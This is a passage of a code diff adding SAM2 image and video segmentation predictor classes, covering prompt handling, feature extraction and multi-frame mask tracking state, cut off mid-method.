+ + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. 
+ prompts (Dict): Dictionary to store various types of prompts for inference. + + Methods: + get_model: Retrieves and initializes the SAM2 model. + prompt_inference: Performs image segmentation inference based on various prompts. + set_image: Preprocesses and sets a single image for inference. + get_im_features: Extracts and processes image features using SAM2's image encoder. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> predictor.set_image("path/to/image.jpg") + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, _ = predictor.prompt_inference(predictor.im, bboxes=bboxes) + >>> print(f"Predicted {len(masks)} masks with average score {scores.mean():.2f}") + """ + + _bb_feat_sizes = [ + (256, 256), + (128, 128), + (64, 64), + ] + + def get_model(self): + """Retrieves and initializes the Segment Anything Model 2 (SAM2) for image segmentation tasks.""" + return build_sam(self.args.model) + + def prompt_inference( + self, + im, + bboxes=None, + points=None, + labels=None, + masks=None, + multimask_output=False, + img_idx=-1, + ): + """ + Performs image segmentation inference based on various prompts using SAM2 architecture. + + This method leverages the Segment Anything Model 2 (SAM2) to generate segmentation masks for input images + based on provided prompts such as bounding boxes, points, or existing masks. It supports both single and + multi-object prediction scenarios. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels. + labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W). + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. 
+ img_idx (int): Index of the image in the batch to process. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores for each mask, with length C. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> image = torch.rand(1, 3, 640, 640) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(image, bboxes=bboxes) + >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}") + + Notes: + - The method supports batched inference for multiple objects when points or bboxes are provided. + - Input prompts (bboxes, points) are automatically scaled to match the input image dimensions. + - When both bboxes and points are provided, they are merged into a single 'points' input for the model. + + References: + - SAM2 Paper: [Add link to SAM2 paper when available] + """ + features = self.get_im_features(im) if self.features is None else self.features + + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + + sparse_embeddings, dense_embeddings = self.model.sam_prompt_encoder( + points=points, + boxes=None, + masks=masks, + ) + # Predict masks + batched_mode = points is not None and points[0].shape[0] > 1 # multi object prediction + high_res_features = [feat_level[img_idx].unsqueeze(0) for feat_level in features["high_res_feats"]] + pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder( + image_embeddings=features["image_embed"][img_idx].unsqueeze(0), + image_pe=self.model.sam_prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + repeat_image=batched_mode, + high_res_features=high_res_features, + ) + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. 
+ return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed points, labels, and masks. + """ + bboxes, points, labels, masks = super()._prepare_prompts(dst_shape, bboxes, points, labels, masks) + if bboxes is not None: + bboxes = bboxes.view(-1, 2, 2) + bbox_labels = torch.tensor([[2, 3]], dtype=torch.int32, device=bboxes.device).expand(len(bboxes), -1) + # NOTE: merge "boxes" and "points" into a single "points" input + # (where boxes are added at the beginning) to model.sam_prompt_encoder + if points is not None: + points = torch.cat([bboxes, points], dim=1) + labels = torch.cat([bbox_labels, labels], dim=1) + else: + points, labels = bboxes, bbox_labels + return points, labels, masks + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference using the SAM2 model. + + This method initializes the model if not already done, configures the data source to the specified image, + and preprocesses the image for feature extraction. It supports setting only one image at a time. 
+ + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing the image. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = SAM2Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(np.array([...])) # Using a numpy array + + Notes: + - This method must be called before performing any inference on a new image. + - The method caches the extracted features for efficient subsequent inferences on the same image. + - Only one image can be set at a time. To process multiple images, call this method for each new image. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features from the SAM image encoder for subsequent processing.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM 2 models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + self._bb_feat_sizes = [[x // (4 * i) for x in self.imgsz] for i in [1, 2, 4]] + + backbone_out = self.model.forward_image(im) + _, vision_feats, _, _ = self.model._prepare_backbone_features(backbone_out) + if self.model.directly_add_no_mem_embed: + vision_feats[-1] = vision_feats[-1] + self.model.no_mem_embed + feats = [ + feat.permute(1, 2, 0).view(1, -1, *feat_size) + for feat, feat_size in zip(vision_feats[::-1], self._bb_feat_sizes[::-1]) + ][::-1] + return {"image_embed": feats[-1], "high_res_feats": feats[:-1]} + + +class SAM2VideoPredictor(SAM2Predictor): + """ + SAM2VideoPredictor to handle user interactions with videos and manage inference states. 
+ + This class extends the functionality of SAM2Predictor to support video processing and maintains + the state of inference operations. It includes configurations for managing non-overlapping masks, + clearing memory for non-conditional inputs, and setting up callbacks for prediction events. + + Attributes: + inference_state (Dict): A dictionary to store the current state of inference operations. + non_overlap_masks (bool): A flag indicating whether masks should be non-overlapping. + clear_non_cond_mem_around_input (bool): A flag to control clearing non-conditional memory around inputs. + clear_non_cond_mem_for_multi_obj (bool): A flag to control clearing non-conditional memory for multi-object scenarios. + callbacks (Dict): A dictionary of callbacks for various prediction lifecycle events. + + Args: + cfg (Dict, Optional): Configuration settings for the predictor. Defaults to DEFAULT_CFG. + overrides (Dict, Optional): Additional configuration overrides. Defaults to None. + _callbacks (List, Optional): Custom callbacks to be added. Defaults to None. + + Note: + The `fill_hole_area` attribute is defined but not used in the current implementation. + """ + + # fill_hole_area = 8 # not used + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the predictor with configuration and optional overrides. + + This constructor initializes the SAM2VideoPredictor with a given configuration, applies any + specified overrides, and sets up the inference state along with certain flags + that control the behavior of the predictor. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. 
+ + Examples: + >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG) + >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640}) + >>> predictor = SAM2VideoPredictor(_callbacks={"on_predict_start": custom_callback}) + """ + super().__init__(cfg, overrides, _callbacks) + self.inference_state = {} + self.non_overlap_masks = True + self.clear_non_cond_mem_around_input = False + self.clear_non_cond_mem_for_multi_obj = False + self.callbacks["on_predict_start"].append(self.init_state) + + def get_model(self): + """ + Retrieves and configures the model with binarization enabled. + + Note: + This method overrides the base class implementation to set the binarize flag to True. + """ + model = super().get_model() + model.set_binarize(True) + return model + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. This + method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt encoder, and + mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List, optional): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List, optional): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List, optional): Labels for point prompts, shape (N, ). 1 = foreground, 0 = background. + masks (np.ndarray, optional): Low-resolution masks from previous predictions shape (N,H,W). For SAM H=W=256. + + Returns: + (np.ndarray): The output masks in shape CxHxW, where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. 
+ """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after 
tracking. + self._add_output_per_object(frame, current_out, storage_key) + self.inference_state["frames_already_tracked"].append(frame) + pred_masks = current_out["pred_masks"].flatten(0, 1) + pred_masks = pred_masks[(pred_masks > self.model.mask_threshold).sum((1, 2)) > 0] # filter blank masks + + return pred_masks, torch.ones(len(pred_masks), dtype=pred_masks.dtype, device=pred_masks.device) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes the predictions to apply non-overlapping constraints if required. + + This method extends the post-processing functionality by applying non-overlapping constraints + to the predicted masks if the `non_overlap_masks` flag is set to True. This ensures that + the masks do not overlap, which can be useful for certain applications. + + Args: + preds (Tuple[torch.Tensor]): The predictions from the model. + img (torch.Tensor): The processed image tensor. + orig_imgs (List[np.ndarray]): The original images before processing. + + Returns: + results (list): The post-processed predictions. + + Note: + If `non_overlap_masks` is True, the method applies constraints to ensure non-overlapping masks. + """ + results = super().postprocess(preds, img, orig_imgs) + if self.non_overlap_masks: + for result in results: + if result.masks is None or len(result.masks) == 0: + continue + result.masks.data = self.model._apply_non_overlapping_constraints(result.masks.data.unsqueeze(0))[0] + return results + + @smart_inference_mode() + def add_new_prompts( + self, + obj_id, + points=None, + labels=None, + masks=None, + frame_idx=0, + ): + """ + Adds new points or masks to a specific frame for a given object ID. + + This method updates the inference state with new prompts (points or masks) for a specified + object and frame index. It ensures that the prompts are either points or masks, but not both, + and updates the internal state accordingly. 
It also handles the generation of new segmentations + based on the provided prompts and the existing state. + + Args: + obj_id (int): The ID of the object to which the prompts are associated. + points (torch.Tensor, Optional): The coordinates of the points of interest. Defaults to None. + labels (torch.Tensor, Optional): The labels corresponding to the points. Defaults to None. + masks (torch.Tensor, optional): Binary masks for the object. Defaults to None. + frame_idx (int, optional): The index of the frame to which the prompts are applied. Defaults to 0. + + Returns: + (tuple): A tuple containing the flattened predicted masks and a tensor of ones indicating the number of objects. + + Raises: + AssertionError: If both `masks` and `points` are provided, or neither is provided. + + Note: + - Only one type of prompt (either points or masks) can be added per call. + - If the frame is being tracked for the first time, it is treated as an initial conditioning frame. + - The method handles the consolidation of outputs and resizing of masks to the original video resolution. + """ + assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other." + obj_idx = self._obj_id_to_idx(obj_id) + + point_inputs = None + pop_key = "point_inputs_per_obj" + if points is not None: + point_inputs = {"point_coords": points, "point_labels": labels} + self.inference_state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs + pop_key = "mask_inputs_per_obj" + self.inference_state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks + self.inference_state[pop_key][obj_idx].pop(frame_idx, None) + # If this frame hasn't been tracked before, we treat it as an initial conditioning + # frame, meaning that the inputs points are to generate segments on this frame without + # using any memory from other frames, like in SAM. Otherwise (if it has been tracked), + # the input points will be used to correct the already tracked masks. 
+ is_init_cond_frame = frame_idx not in self.inference_state["frames_already_tracked"] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + # Add a frame to conditioning output if it's an initial conditioning frame or + # if the model sees all frames receiving clicks/mask as conditioning frames. + is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Get any previously predicted mask logits on this object and feed it along with + # the new clicks into the SAM mask decoder. + prev_sam_mask_logits = None + # lookup temporary output dict first, which contains the most recent output + # (if not found, then lookup conditioning and non-conditioning frame output) + if point_inputs is not None: + prev_out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + + if prev_out is not None and prev_out.get("pred_masks") is not None: + prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True) + # Clamp the scale of prev_sam_mask_logits to avoid rare numerical issues. + prev_sam_mask_logits.clamp_(-32.0, 32.0) + current_out = self._run_single_frame_inference( + output_dict=obj_output_dict, # run on the slice of a single object + frame_idx=frame_idx, + batch_size=1, # run on the slice of a single object + is_init_cond_frame=is_init_cond_frame, + point_inputs=point_inputs, + mask_inputs=masks, + reverse=False, + # Skip the memory encoder when adding clicks or mask. We execute the memory encoder + # at the beginning of `propagate_in_video` (after user finalize their clicks). This + # allows us to enforce non-overlapping constraints on all objects before encoding + # them into memory. 
+ run_mem_encoder=False, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + # Add the output to the output dict (to be used as future memory) + obj_temp_output_dict[storage_key][frame_idx] = current_out + + # Resize the output mask to the original video resolution + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, + is_cond=is_cond, + run_mem_encoder=False, + ) + pred_masks = consolidated_out["pred_masks"].flatten(0, 1) + return pred_masks.flatten(0, 1), torch.ones(1, dtype=pred_masks.dtype, device=pred_masks.device) + + @smart_inference_mode() + def propagate_in_video_preflight(self): + """ + Prepare inference_state and consolidate temporary outputs before tracking. + + This method marks the start of tracking, disallowing the addition of new objects until the session is reset. + It consolidates temporary outputs from `temp_output_dict_per_obj` and merges them into `output_dict`. + Additionally, it clears non-conditioning memory around input frames and ensures that the state is consistent + with the provided inputs. + """ + # Tracking has started and we don't allow adding new objects until session is reset. + self.inference_state["tracking_has_started"] = True + batch_size = len(self.inference_state["obj_idx_to_id"]) + + # Consolidate per-object temporary outputs in "temp_output_dict_per_obj" and + # add them into "output_dict". + temp_output_dict_per_obj = self.inference_state["temp_output_dict_per_obj"] + output_dict = self.inference_state["output_dict"] + # "consolidated_frame_inds" contains indices of those frames where consolidated + # temporary outputs have been added (either in this call or any previous calls + # to `propagate_in_video_preflight`). 
+ consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + for is_cond in {False, True}: + # Separately consolidate conditioning and non-conditioning temp outptus + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + # Find all the frames that contain temporary outputs for any objects + # (these should be the frames that have just received clicks for mask inputs + # via `add_new_points` or `add_new_mask`) + temp_frame_inds = set() + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + temp_frame_inds.update(obj_temp_output_dict[storage_key].keys()) + consolidated_frame_inds[storage_key].update(temp_frame_inds) + # consolidate the temprary output across all objects on this frame + for frame_idx in temp_frame_inds: + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, is_cond=is_cond, run_mem_encoder=True + ) + # merge them into "output_dict" and also create per-object slices + output_dict[storage_key][frame_idx] = consolidated_out + self._add_output_per_object(frame_idx, consolidated_out, storage_key) + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame_idx) + + # clear temporary outputs in `temp_output_dict_per_obj` + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + obj_temp_output_dict[storage_key].clear() + + # edge case: if an output is added to "cond_frame_outputs", we remove any prior + # output on the same frame in "non_cond_frame_outputs" + for frame_idx in output_dict["cond_frame_outputs"]: + output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + for frame_idx in obj_output_dict["cond_frame_outputs"]: + obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for frame_idx in 
consolidated_frame_inds["cond_frame_outputs"]: + assert frame_idx in output_dict["cond_frame_outputs"] + consolidated_frame_inds["non_cond_frame_outputs"].discard(frame_idx) + + # Make sure that the frame indices in "consolidated_frame_inds" are exactly those frames + # with either points or mask inputs (which should be true under a correct workflow). + all_consolidated_frame_inds = ( + consolidated_frame_inds["cond_frame_outputs"] | consolidated_frame_inds["non_cond_frame_outputs"] + ) + input_frames_inds = set() + for point_inputs_per_frame in self.inference_state["point_inputs_per_obj"].values(): + input_frames_inds.update(point_inputs_per_frame.keys()) + for mask_inputs_per_frame in self.inference_state["mask_inputs_per_obj"].values(): + input_frames_inds.update(mask_inputs_per_frame.keys()) + assert all_consolidated_frame_inds == input_frames_inds + + @staticmethod + def init_state(predictor): + """ + Initialize an inference state for the predictor. + + This function sets up the initial state required for performing inference on video data. + It includes initializing various dictionaries and ordered dictionaries that will store + inputs, outputs, and other metadata relevant to the tracking process. + + Args: + predictor (SAM2VideoPredictor): The predictor object for which to initialize the state. 
+ """ + if len(predictor.inference_state) > 0: # means initialized + return + assert predictor.dataset is not None + assert predictor.dataset.mode == "video" + + inference_state = {} + inference_state["num_frames"] = predictor.dataset.frames + # inputs on each frame + inference_state["point_inputs_per_obj"] = {} + inference_state["mask_inputs_per_obj"] = {} + # values that don't change across frames (so we only need to hold one copy of them) + inference_state["constants"] = {} + # mapping between client-side object id and model-side object index + inference_state["obj_id_to_idx"] = OrderedDict() + inference_state["obj_idx_to_id"] = OrderedDict() + inference_state["obj_ids"] = [] + # A storage to hold the model's tracking results and states on each frame + inference_state["output_dict"] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + # Slice (view) of each object tracking results, sharing the same memory with "output_dict" + inference_state["output_dict_per_obj"] = {} + # A temporary storage to hold new outputs when user interact with a frame + # to add clicks or mask (it's merged into "output_dict" before propagation starts) + inference_state["temp_output_dict_per_obj"] = {} + # Frames that already holds consolidated outputs from click or mask inputs + # (we directly use their consolidated outputs during tracking) + inference_state["consolidated_frame_inds"] = { + "cond_frame_outputs": set(), # set containing frame indices + "non_cond_frame_outputs": set(), # set containing frame indices + } + # metadata for each tracking frame (e.g. which direction it's tracked) + inference_state["tracking_has_started"] = False + inference_state["frames_already_tracked"] = [] + predictor.inference_state = inference_state + + def get_im_features(self, im, batch=1): + """ + Extracts and processes image features using SAM2's image encoder for subsequent segmentation tasks. 
+ + Args: + im (torch.Tensor): The input image tensor. + batch (int, optional): The batch size for expanding features if there are multiple prompts. Defaults to 1. + + Returns: + vis_feats (torch.Tensor): The visual features extracted from the image. + vis_pos_embed (torch.Tensor): The positional embeddings for the visual features. + feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features. + + Note: + - If `batch` is greater than 1, the features are expanded to fit the batch size. + - The method leverages the model's `_prepare_backbone_features` method to prepare the backbone features. + """ + backbone_out = self.model.forward_image(im) + if batch > 1: # expand features if there's more than one prompt + for i, feat in enumerate(backbone_out["backbone_fpn"]): + backbone_out["backbone_fpn"][i] = feat.expand(batch, -1, -1, -1) + for i, pos in enumerate(backbone_out["vision_pos_enc"]): + pos = pos.expand(batch, -1, -1, -1) + backbone_out["vision_pos_enc"][i] = pos + _, vis_feats, vis_pos_embed, feat_sizes = self.model._prepare_backbone_features(backbone_out) + return vis_feats, vis_pos_embed, feat_sizes + + def _obj_id_to_idx(self, obj_id): + """ + Map client-side object id to model-side object index. + + Args: + obj_id (int): The unique identifier of the object provided by the client side. + + Returns: + obj_idx (int): The index of the object on the model side. + + Raises: + RuntimeError: If an attempt is made to add a new object after tracking has started. + + Note: + - The method updates or retrieves mappings between object IDs and indices stored in + `inference_state`. + - It ensures that new objects can only be added before tracking commences. + - It maintains two-way mappings between IDs and indices (`obj_id_to_idx` and `obj_idx_to_id`). + - Additional data structures are initialized for the new object to store inputs and outputs. 
+ """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. 
+ is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict, Optional): Input points and their labels. Defaults to None. + mask_inputs (torch.Tensor, Optional): Input binary masks. Defaults to None. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided, or neither is provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements. 
+ """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features( + self.inference_state["im"], batch_size + ) + + # point and mask should not appear as input simultaneously on the same frame + assert point_inputs is None or mask_inputs is None + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=is_init_cond_frame, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=point_inputs, + mask_inputs=mask_inputs, + output_dict=output_dict, + num_frames=self.inference_state["num_frames"], + track_in_reverse=reverse, + run_mem_encoder=run_mem_encoder, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + + maskmem_features = current_out["maskmem_features"] + if maskmem_features is not None: + current_out["maskmem_features"] = maskmem_features.to( + dtype=torch.float16, device=self.device, non_blocking=True + ) + # NOTE: Do not support the `fill_holes_in_mask_scores` function since it needs cuda extensions + # potentially fill holes in the predicted masks + # if self.fill_hole_area > 0: + # pred_masks = current_out["pred_masks"].to(self.device, non_blocking=True) + # pred_masks = fill_holes_in_mask_scores(pred_masks, self.fill_hole_area) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + current_out["maskmem_pos_enc"] = self._get_maskmem_pos_enc(current_out["maskmem_pos_enc"]) + return current_out + + def _get_maskmem_pos_enc(self, out_maskmem_pos_enc): + """ + Caches and manages the positional encoding for mask memory across frames and objects. + + This method optimizes storage by caching the positional encoding (`maskmem_pos_enc`) for + mask memory, which is constant across frames and objects, thus reducing the amount of + redundant information stored during an inference session. 
It checks if the positional + encoding has already been cached; if not, it caches a slice of the provided encoding. + If the batch size is greater than one, it expands the cached positional encoding to match + the current batch size. + + Args: + out_maskmem_pos_enc (List[torch.Tensor] or None): The positional encoding for mask memory. + Should be a list of tensors or None. + + Returns: + out_maskmem_pos_enc (List[torch.Tensor]): The positional encoding for mask memory, either cached or expanded. + + Note: + - The method assumes that `out_maskmem_pos_enc` is a list of tensors or None. + - Only a single object's slice is cached since the encoding is the same across objects. + - The method checks if the positional encoding has already been cached in the session's constants. + - If the batch size is greater than one, the cached encoding is expanded to fit the batch size. + """ + model_constants = self.inference_state["constants"] + # "out_maskmem_pos_enc" should be either a list of tensors or None + if out_maskmem_pos_enc is not None: + if "maskmem_pos_enc" not in model_constants: + assert isinstance(out_maskmem_pos_enc, list) + # only take the slice for one object, since it's same across objects + maskmem_pos_enc = [x[0:1].clone() for x in out_maskmem_pos_enc] + model_constants["maskmem_pos_enc"] = maskmem_pos_enc + else: + maskmem_pos_enc = model_constants["maskmem_pos_enc"] + # expand the cached maskmem_pos_enc to the actual batch size + batch_size = out_maskmem_pos_enc[0].size(0) + if batch_size > 1: + out_maskmem_pos_enc = [x.expand(batch_size, -1, -1, -1) for x in maskmem_pos_enc] + return out_maskmem_pos_enc + + def _consolidate_temp_output_across_obj( + self, + frame_idx, + is_cond=False, + run_mem_encoder=False, + ): + """ + Consolidates per-object temporary outputs into a single output for all objects. + + This method combines the temporary outputs for each object on a given frame into a unified + output. 
It fills in any missing objects either from the main output dictionary or leaves + placeholders if they do not exist in the main output. Optionally, it can re-run the memory + encoder after applying non-overlapping constraints to the object scores. + + Args: + frame_idx (int): The index of the frame for which to consolidate outputs. + is_cond (bool, Optional): Indicates if the frame is considered a conditioning frame. + Defaults to False. + run_mem_encoder (bool, Optional): Specifies whether to run the memory encoder after + consolidating the outputs. Defaults to False. + + Returns: + consolidated_out (dict): A consolidated output dictionary containing the combined results for all objects. + + Note: + - The method initializes the consolidated output with placeholder values for missing objects. + - It searches for outputs in both the temporary and main output dictionaries. + - If `run_mem_encoder` is True, it applies non-overlapping constraints and re-runs the memory encoder. + - The `maskmem_features` and `maskmem_pos_enc` are only populated when `run_mem_encoder` is True. + """ + batch_size = len(self.inference_state["obj_idx_to_id"]) + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Initialize `consolidated_out`. Its "maskmem_features" and "maskmem_pos_enc" + # will be added when 